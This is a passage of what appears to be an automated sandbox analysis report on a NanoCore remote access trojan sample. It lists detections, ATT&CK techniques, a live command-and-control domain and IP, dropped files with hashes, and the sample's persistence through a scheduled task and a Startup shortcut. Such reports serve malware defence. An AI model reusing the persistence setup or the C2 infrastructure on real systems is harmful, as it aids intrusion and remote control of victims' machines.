        Source: qnJXJsqt1M.exe, 00000000.00000002.241202485.0000000001603000.00000004.00000001.sdmp Binary or memory string: t0lj1bz7kyfvrnjhanglri8hhtcuWIN_7rs4zlupb30fv5ap

        Remote Access Functionality:

        Detected Nanocore Rat
        Source: qnJXJsqt1M.exe, 00000000.00000003.234051628.00000000016D3000.00000004.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
        Source: MSBuild.exe, 00000001.00000002.506144635.0000000004237000.00000004.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
        Source: znytpstdcrwsisx.exe, 0000000B.00000003.271278827.0000000004519000.00000004.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
        Source: MSBuild.exe, 0000000C.00000002.287551362.0000000004581000.00000004.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
        Yara detected Nanocore RAT
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exe Code function: 0_2_00B28C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exe Code function: 0_2_00B2923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe Code function: 1_2_0542275A bind,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe Code function: 1_2_05422708 bind,

        Mitre Att&ck Matrix

        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
        Valid Accounts 2 | Native API 1 | Startup Items 1 | Startup Items 1 | Disable or Modify Tools 11 | Input Capture 31 | System Time Discovery 1 | Remote Services | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
        Default Accounts | Scheduled Task/Job 1 | Application Shimming 1 | Exploitation for Privilege Escalation 1 | Deobfuscate/Decode Files or Information 11 | LSASS Memory | Account Discovery 1 | Remote Desktop Protocol | Input Capture 31 | Exfiltration Over Bluetooth | Encrypted Channel 12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
        Domain Accounts | At (Linux) | Valid Accounts 2 | Application Shimming 1 | Obfuscated Files or Information 2 | Security Account Manager | File and Directory Discovery 1 | SMB/Windows Admin Shares | Clipboard Data 2 | Automated Exfiltration | Remote Access Software 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
        Local Accounts | At (Windows) | Scheduled Task/Job 1 | Valid Accounts 2 | Software Packing 11 | NTDS | System Information Discovery 26 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol 1 | SIM Card Swap | | Carrier Billing Fraud
        Cloud Accounts | Cron | Registry Run Keys / Startup Folder 2 | Access Token Manipulation 21 | Masquerading 1 | LSA Secrets | Security Software Discovery 231 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol 22 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
        Replication Through Removable Media | Launchd | Rc.common | Process Injection 312 | Valid Accounts 2 | Cached Domain Credentials | Virtualization/Sandbox Evasion 21 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
        External Remote Services | Scheduled Task | Startup Items | Scheduled Task/Job 1 | Virtualization/Sandbox Evasion 21 | DCSync | Process Discovery 3 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
        Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Registry Run Keys / Startup Folder 2 | Access Token Manipulation 21 | Proc Filesystem | Application Window Discovery 11 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
        Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Process Injection 312 | /etc/passwd and /etc/shadow | System Owner/User Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

        Behavior Graph

        [Behavior graph image. Behavior Graph ID: 383820, Sample: qnJXJsqt1M.exe, Startdate: 08/04/2021, Architecture: WINDOWS, Score: 100]

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        Source | Detection | Scanner | Label | Link
        qnJXJsqt1M.exe | 68% | Virustotal | | Browse
        qnJXJsqt1M.exe | 41% | Metadefender | | Browse
        qnJXJsqt1M.exe | 79% | ReversingLabs | Win32.Backdoor.NanoCore |
        qnJXJsqt1M.exe | 100% | Avira | DR/AutoIt.Gen8 |

        Dropped Files

        Source | Detection | Scanner | Label | Link
        C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exe | 100% | Avira | DR/AutoIt.Gen8 |
        C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exe | 55% | Virustotal | | Browse
        C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exe | 48% | ReversingLabs | Win32.Trojan.Wacatac |

        Unpacked PE Files

        Source | Detection | Scanner | Label | Link | Download
        1.2.MSBuild.exe.400000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7 | | Download File
        11.2.znytpstdcrwsisx.exe.d50000.0.unpack | 100% | Avira | DR/AutoIt.Gen8 | | Download File
        12.2.MSBuild.exe.400000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7 | | Download File
        11.0.znytpstdcrwsisx.exe.d50000.0.unpack | 100% | Avira | DR/AutoIt.Gen8 | | Download File
        0.2.qnJXJsqt1M.exe.ad0000.0.unpack | 100% | Avira | DR/AutoIt.Gen8 | | Download File
        0.0.qnJXJsqt1M.exe.ad0000.0.unpack | 100% | Avira | DR/AutoIt.Gen8 | | Download File
        1.2.MSBuild.exe.5e00000.9.unpack | 100% | Avira | TR/NanoCore.fadte | | Download File

        Domains

        Source | Detection | Scanner | Label | Link
        nickdns22.duckdns.org | 7% | Virustotal | | Browse

        URLs

        Source | Detection | Scanner | Label | Link
        nickdns22.duckdns.org | 7% | Virustotal | | Browse
        nickdns22.duckdns.org | 0% | Avira URL Cloud | safe |
        127.0.0.1 | 0% | Virustotal | | Browse
        127.0.0.1 | 0% | Avira URL Cloud | safe |

        Domains and IPs

        Contacted Domains

        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        nickdns22.duckdns.org | 192.169.69.26 | true | true | | unknown

        Contacted URLs

        Name | Malicious | Antivirus Detection | Reputation
        nickdns22.duckdns.org | true | 7%, Virustotal, Browse; Avira URL Cloud: safe | unknown
        127.0.0.1 | true | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown

        Contacted IPs


        Public

        IP | Domain | Country | Flag | ASN | ASN Name | Malicious
        192.169.69.26 | nickdns22.duckdns.org | United States | | 23033 | WOWUS | true

        Private

        IP
        192.168.2.1
        127.0.0.1

        General Information

        Joe Sandbox Version:31.0.0 Emerald
        Analysis ID:383820
        Start date:08.04.2021
        Start time:10:31:20
        Joe Sandbox Product:CloudBasic
        Overall analysis duration:0h 9m 49s
        Hypervisor based Inspection enabled:false
        Report type:light
        Sample file name:qnJXJsqt1M.exe
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
        Number of analysed new started processes analysed:35
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • HDC enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Detection:MAL
        Classification:mal100.troj.evad.winEXE@11/10@13/3
        EGA Information:Failed
        HDC Information:
        • Successful, ratio: 5.9% (good quality ratio 5.9%)
        • Quality average: 82.1%
        • Quality standard deviation: 20.4%
        HCA Information:
        • Successful, ratio: 69%
        • Number of executed functions: 0
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Adjust boot time
        • Enable AMSI
        • Found application associated with file extension: .exe
        Warnings:
        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
        • TCP Packets have been reduced to 100
        • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
        • Excluded IPs from analysis (whitelisted): 104.43.193.48, 13.64.90.137, 104.43.139.144, 23.54.113.53, 95.100.54.203, 13.88.21.125, 20.82.210.154, 23.10.249.43, 23.10.249.26, 23.0.174.185, 23.0.174.200, 52.155.217.156, 20.54.26.129
        • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
        • Report size exceeded maximum capacity and may have missing disassembly code.
        • Report size getting too big, too many NtAllocateVirtualMemory calls found.

        Simulations

        Behavior and APIs

        Time | Type | Description
        10:32:15 | Task Scheduler | Run new task: DHCP Monitor path: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe" s>$(Arg0)
        10:32:15 | API Interceptor | 995x Sleep call for process: MSBuild.exe modified
        10:32:15 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\znytpstdcrwsisx.fr.url

        Joe Sandbox View / Context

        IPs

        Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
        192.169.69.26 | MglhrJiLUL.exe | Get hash | malicious | Browse | 195.245.112.115/index.php
         | On35KJkYT4.exe | Get hash | malicious | Browse | 195.245.112.115/index.php
         | Order_List.xlsx | Get hash | malicious | Browse | dubaisupport.duckdns.org/file.exe

        Domains

        No context

        ASN

        Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
        WOWUS | 1RkccAiQMy.exe | Get hash | malicious | Browse | 192.169.69.25
         | NaHU7wO2Wf.exe | Get hash | malicious | Browse | 192.169.69.25
         | hQtNCi8128.exe | Get hash | malicious | Browse | 192.169.69.25
         | FB11.exe | Get hash | malicious | Browse | 216.244.74.42
         | CDFCB9455FC457AC23BE82004BDCF4120E3C8D6FD2918.exe | Get hash | malicious | Browse | 192.169.69.25
         | EUjk8F87b8.exe | Get hash | malicious | Browse | 192.169.69.25
         | MglhrJiLUL.exe | Get hash | malicious | Browse | 192.169.69.26
         | On35KJkYT4.exe | Get hash | malicious | Browse | 192.169.69.26
         | ORDER-0319.pdf.exe | Get hash | malicious | Browse | 192.169.69.25
         | ORDER-21031566AF.exe | Get hash | malicious | Browse | 192.169.69.25
         | ttmPnejtED.js | Get hash | malicious | Browse | 192.169.69.25
         | 3Ad4ZKWT0L.exe | Get hash | malicious | Browse | 192.169.69.25
         | EbJIveZLAv.exe | Get hash | malicious | Browse | 192.169.69.26
         | Order_List.xlsx | Get hash | malicious | Browse | 192.169.69.26
         | payload3.exe | Get hash | malicious | Browse | 192.169.69.25
         | ORDER-02108 xls.exe | Get hash | malicious | Browse | 192.169.69.25
         | ORDER #0206.exe | Get hash | malicious | Browse | 192.169.69.25
         | mensaje 2201 012021 PPK_8747.doc | Get hash | malicious | Browse | 207.244.148.124
         | New Order.exe | Get hash | malicious | Browse | 172.93.222.169
         | SOPORTEDE.exe | Get hash | malicious | Browse | 192.169.69.26

        JA3 Fingerprints

        No context

        Dropped Files

        No context

        Created / dropped Files

        C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\MSBuild.exe.log
        Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
        File Type:ASCII text, with CRLF line terminators
        Category:modified
        Size (bytes):325
        Entropy (8bit):5.334380084018418
        Encrypted:false
        SSDEEP:6:Q3LadLCR22IAQykdL1tZbLsbFLIP12MUAvvro6ysGMFLIP12MUAvvrs:Q3LaJU20NaL1tZbgbe4MqJsGMe4M6
        MD5:65CE98936A67552310EFE2F0FF5BDF88
        SHA1:8133653A6B9A169C7496ADE315CED322CFC3613A
        SHA-256:682F7C55B1B6E189D17755F74959CD08762F91373203B3B982ACFFCADE2E871A
        SHA-512:2D00AC024267EC384720A400F6D0B4F7EDDF49FAF8AB3C9E6CBFBBAE90ECADACA9022B33E3E8EC92E4F57C7FC830299C8643235EB4AA7D8A6AFE9DD1775F57C3
        Malicious:false
        Reputation:moderate, very likely benign file
        Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..2,"Microsoft.Build.Engine, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.Build.Framework, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
        C:\Users\user\AppData\Local\Temp\autB7CF.tmp
        Process:C:\Users\user\Desktop\qnJXJsqt1M.exe
        File Type:data
        Category:dropped
        Size (bytes):207872
        Entropy (8bit):7.999050560075495
        Encrypted:true
        SSDEEP:6144:yfHioBK/DQ0vgnZ92J6yN8n59mrjuydK/znla5oC:yfOjvgb2JpNeorjOznA5oC
        MD5:D63A88D1A1B8198E665C1094E96488BC
        SHA1:427EA9EB92C1C20B647CECD78C6085B509BCC326
        SHA-256:68B951C18FA6D7FDD30A5EB01609BAB36677D1414A6EC2D5A25C327A7D7CB9B0
        SHA-512:9C79A3F8E506447F6B5D24E27CED80E4EE449245D3483741EBD27E89656423B0ABDE9AE8ADBEAB430566999E86E3E70A8FECB6FE7F515F327066FF42E7A9E236
        Malicious:false
        Reputation:low
        C:\Users\user\AppData\Local\Temp\cbmfpeiu
        Process:C:\Users\user\Desktop\qnJXJsqt1M.exe
        File Type:data
        Category:modified
        Size (bytes):207872
        Entropy (8bit):7.999050560075495
        Encrypted:true
        SSDEEP:6144:yfHioBK/DQ0vgnZ92J6yN8n59mrjuydK/znla5oC:yfOjvgb2JpNeorjOznA5oC
        MD5:D63A88D1A1B8198E665C1094E96488BC
        SHA1:427EA9EB92C1C20B647CECD78C6085B509BCC326
        SHA-256:68B951C18FA6D7FDD30A5EB01609BAB36677D1414A6EC2D5A25C327A7D7CB9B0
        SHA-512:9C79A3F8E506447F6B5D24E27CED80E4EE449245D3483741EBD27E89656423B0ABDE9AE8ADBEAB430566999E86E3E70A8FECB6FE7F515F327066FF42E7A9E236
        Malicious:false
        Reputation:low
        C:\Users\user\AppData\Local\Temp\tmpC4DF.tmp
        Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):1320
        Entropy (8bit):5.136963558289723
        Encrypted:false
        SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0mnc2xtn:cbk4oL600QydbQxIYODOLedq3ZLj
        MD5:AE766004C0D8792953BAFFFE8F6A2E3B
        SHA1:14B12F27543A401E2FE0AF8052E116CAB0032426
        SHA-256:1ABDD9B6A6B84E4BA1AF1282DC84CE276C59BA253F4C4AF05FEA498A4FD99540
        SHA-512:E530DA4A5D4336FC37838D0E93B5EB3804B9C489C71F6954A47FC81A4C655BB72EC493E109CF96E6E3617D7623AC80697AD3BBD5FFC6281BAFC8B34DCA5E6567
        Malicious:true
        Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
        C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
        Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
        File Type:Non-ISO extended-ASCII text, with no line terminators
        Category:dropped
        Size (bytes):8
        Entropy (8bit):3.0
        Encrypted:false
        SSDEEP:3:2kn:2kn
        MD5:2CCE6DD7EC46400F96706148A26C15E9
        SHA1:776024E284F2F59F8E908E2D5E6CDFBC64BD0533
        SHA-256:513BD4A52AF323A89B4DC79B6CF52BA9FF9EABCB8809164B1E6245311A97FC03
        SHA-512:A6D98B433EB75EEDC79B4360E309127F34DB49D3E596B9C0520D2E10BDDF26C170F96AF87B2C26451A82B7DB7AAD568894E9DBC0E1BDEE45B17A4F95CCE04DC3
        Malicious:true
        Preview: `.?...H
        C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\task.dat
        Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
        File Type:ASCII text, with no line terminators
        Category:dropped
        Size (bytes):57
        Entropy (8bit):4.85263908467479
        Encrypted:false
        SSDEEP:3:oMty8WbSI1u:oMLWuI1u
        MD5:A35128E4E28B27328F70E4E8FF482443
        SHA1:B89066B2F8DB34299AABFD7ABEE402D5444DD079
        SHA-256:88AEA00733DC4B570A29D56A423CC5BF163E5ACE7AF349972EB0BBA8D9AD06E1
        SHA-512:F098E844B5373B34642B49B6E0F2E15CFDAA1A8B6CABC2196CEC0F3765289E5B1FD4AB588DD65F97C8E51FA9A81077621E9A06946859F296904C646906A70F33
        Malicious:false
        Preview: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\znytpstdcrwsisx.fr.url
        Process:C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exe
        File Type:MS Windows 95 Internet shortcut text (URL=<file:///C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exe>), ASCII text, with CRLF line terminators
        Category:modified
        Size (bytes):97
        Entropy (8bit):4.93582930767928
        Encrypted:false
        SSDEEP:3:HRAbABGQYm5uO0nacwREaKC5D9c6AQA:HRYFVmwOcNwiaZ5D+1V
        MD5:4123D4FB8377EF3CC0C17FE846A33369
        SHA1:FFD3BFA064E3245D1D49D0CBCFBC2DA102A69021
        SHA-256:486EDCABE152F5B618A2867452A35A42A87D5A831E520F4110CFF057B7356814
        SHA-512:C8F77644F8B08EB11590C6E6F02175E9501BD2FC772382D52342AD8331ED5D66783EB7D409E07B031485F8299956E906E2BE0DA160C0B0EEF63141AFC195CFD6
        Malicious:true
        Yara Hits:
        • Rule: Methodology_Suspicious_Shortcut_Local_URL, Description: Detects local script usage for .URL persistence, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\znytpstdcrwsisx.fr.url, Author: @itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson)
        Preview: [InternetShortcut]..URL=file:///C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exe
        C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exe
        Process:C:\Users\user\Desktop\qnJXJsqt1M.exe
        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
        Category:dropped
        Size (bytes):1253382
        Entropy (8bit):7.157529868192481
        Encrypted:false
        SSDEEP:24576:Ptb20pkaCqT5TBWgNn97agoIpzBTbOGabuHqQE1drbmz6AK:MVg5t97aIFsGabuKxez5K
        MD5:206B9BA9B804BD72DB71AEBAB5967567
        SHA1:D78387B9A72560CE7E3E0D7B5C35123E17382202
        SHA-256:32B7D46EC03F2580FED078C680CEEAD30BA9B2541C7E9EE1BB5EAE35F2DBD6D0
        SHA-512:F42B8C7A2483DBCE95BD15F9668D5CD8372302EF2EBBFD65392A2B7B6F2D65C15C3BF5598F29349A38D58C8E2F994F4551D2E82F63921D41929BD0924F5322C6
        Malicious:true
        Antivirus:
        • Antivirus: Avira, Detection: 100%
        • Antivirus: Virustotal, Detection: 55%, Browse
        • Antivirus: ReversingLabs, Detection: 48%
        \Device\ConDrv
        Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):235
        Entropy (8bit):5.107306146099542
        Encrypted:false
        SSDEEP:6:zx3M1tlAX8bSWR30qysGMQbSVRRZBXVRbJ0fFPRAgRYan:zK1XnV30ZsGMIG9BFRbQ5AUYan
        MD5:67DDD8252A246E7B14649B0063E351C0
        SHA1:AAE1C6839D1CC4A626D0FB2D4773823AD209FA17
        SHA-256:24C8283BA3F7FCA2E4CEF6F141263DD1E8A36E5A5CD96A97BFE83525D7663116
        SHA-512:326A5E0A440F60D4808C91499F1F3616C496B67DC053B4A2A40B0FE09002074AE5365018781F8746E98E7E3CFCD35F1310D17FB7C2138A8157318E6791987025
        Malicious:false
        Preview: Microsoft (R) Build Engine Version 2.0.50727.8922..[Microsoft .NET Framework, Version 2.0.50727.8922]..Copyright (C) Microsoft Corporation 2005. All rights reserved.....MSBUILD : error MSB1009: Project file does not exist...Switch: 0..

        Static File Info

        General

        File type:PE32 executable (GUI) Intel 80386, for MS Windows
        Entropy (8bit):7.157525970840198
        TrID:
        • Win32 Executable (generic) a (10002005/4) 99.96%
        • Generic Win/DOS Executable (2004/3) 0.02%
        • DOS Executable Generic (2002/1) 0.02%
        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
        File name:qnJXJsqt1M.exe
        File size:1253376
        MD5:e98ce8a425d942e7337ecbd309707e25
        SHA1:39e794cff61991cbcc073db38bfbf1e496953106
        SHA256:34d2073606f34324e1ba7146defa9f69e387059b64d1bfb28a5c9f37b0fc9436
        SHA512:a63c9c18d7c06d498b6214ba0899cd17a078f28fc3ce813175334eda332d075abc74ce93b78ad3c4e55e8e7f0cb352ece64ae8a3265cda38b0358e0a1ee32e17
        SSDEEP:24576:Ptb20pkaCqT5TBWgNn97agoIpzBTbOGabuHqQE1drbmz6A:MVg5t97aIFsGabuKxez5
        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

        File Icon

        Icon Hash:e0b8cef0f0e264e4

        Static PE Info

        General

        Entrypoint:0x425f74
        Entrypoint Section:.text
        Digitally signed:false
        Imagebase:0x400000
        Subsystem:windows gui
        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
        DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE
        Time Stamp:0x5BAE3218 [Fri Sep 28 13:52:24 2018 UTC]
        TLS Callbacks:
        CLR (.Net) Version:
        OS Version Major:5
        OS Version Minor:1
        File Version Major:5
        File Version Minor:1
        Subsystem Version Major:5
        Subsystem Version Minor:1
        Import Hash:3d95adbf13bbe79dc24dccb401c12091

        Entrypoint Preview

        Instruction
        call 00007FA134CAE81Fh
        jmp 00007FA134CA1834h
        int3
        int3
        push edi
        push esi
        mov esi, dword ptr [esp+10h]
        mov ecx, dword ptr [esp+14h]
        mov edi, dword ptr [esp+0Ch]
        mov eax, ecx
        mov edx, ecx
        add eax, esi
        cmp edi, esi
        jbe 00007FA134CA19BAh
        cmp edi, eax
        jc 00007FA134CA1D1Eh
        bt dword ptr [004C0158h], 01h
        jnc 00007FA134CA19B9h
        rep movsb
        jmp 00007FA134CA1CCCh
        cmp ecx, 00000080h
        jc 00007FA134CA1B84h
        mov eax, edi
        xor eax, esi
        test eax, 0000000Fh
        jne 00007FA134CA19C0h
        bt dword ptr [004BA370h], 01h
        jc 00007FA134CA1E90h
        bt dword ptr [004C0158h], 00000000h
        jnc 00007FA134CA1B5Dh
        test edi, 00000003h
        jne 00007FA134CA1B6Eh
        test esi, 00000003h
        jne 00007FA134CA1B4Dh
        bt edi, 02h
        jnc 00007FA134CA19BFh
        mov eax, dword ptr [esi]
        sub ecx, 04h
        lea esi, dword ptr [esi+04h]
        mov dword ptr [edi], eax
        lea edi, dword ptr [edi+04h]
        bt edi, 03h
        jnc 00007FA134CA19C3h
        movq xmm1, qword ptr [esi]
        sub ecx, 08h
        lea esi, dword ptr [esi+08h]
        movq qword ptr [edi], xmm1
        lea edi, dword ptr [edi+08h]
        test esi, 00000007h
        je 00007FA134CA1A15h
        bt esi, 03h
        jnc 00007FA134CA1A68h
        movdqa xmm1, dqword ptr [esi+00h]

        Rich Headers

        Programming Language:
        • [RES] VS2012 UPD4 build 61030
        • [ASM] VS2012 UPD4 build 61030
        • [ C ] VS2008 SP1 build 30729
        • [IMP] VS2008 SP1 build 30729
        • [LNK] VS2012 UPD4 build 61030

        Data Directories

        Name | Virtual Address | Virtual Size | Is in Section
        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb7004 | 0x17c | .rdata
        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc4000 | 0x54f80 | .rsrc
        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x119000 | 0x6c4c | .reloc
        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x8d8d0 | 0x1c | .rdata
        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb2730 | 0x40 | .rdata
        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_IAT | 0x8d000 | 0x860 | .rdata
        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

        Sections

        Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
        .text | 0x1000 | 0x8b54f | 0x8b600 | False | 0.569949901906 | data | 6.68041374921 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        .rdata | 0x8d000 | 0x2cc42 | 0x2ce00 | False | 0.330464397632 | data | 5.77019233319 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        .data | 0xba000 | 0x9d54 | 0x6200 | False | 0.164022640306 | data | 2.00269109997 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
        .rsrc | 0xc4000 | 0x54f80 | 0x55000 | False | 0.923647173713 | data | 7.80704970662 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        .reloc | 0x119000 | 0xa474 | 0xa600 | False | 0.501788403614 | data | 5.24542665412 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

        Resources

        Name | RVA | Size | Type | Language | Country
        RT_ICON | 0xc4590 | 0x128 | GLS_BINARY_LSB_FIRST | English | Great Britain
        RT_ICON | 0xc46b8 | 0x668 | data | English | Great Britain
        RT_ICON | 0xc4d20 | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 2273871991, next used block 16289656 | English | Great Britain
        RT_ICON | 0xc5008 | 0x1e8 | data | English | Great Britain
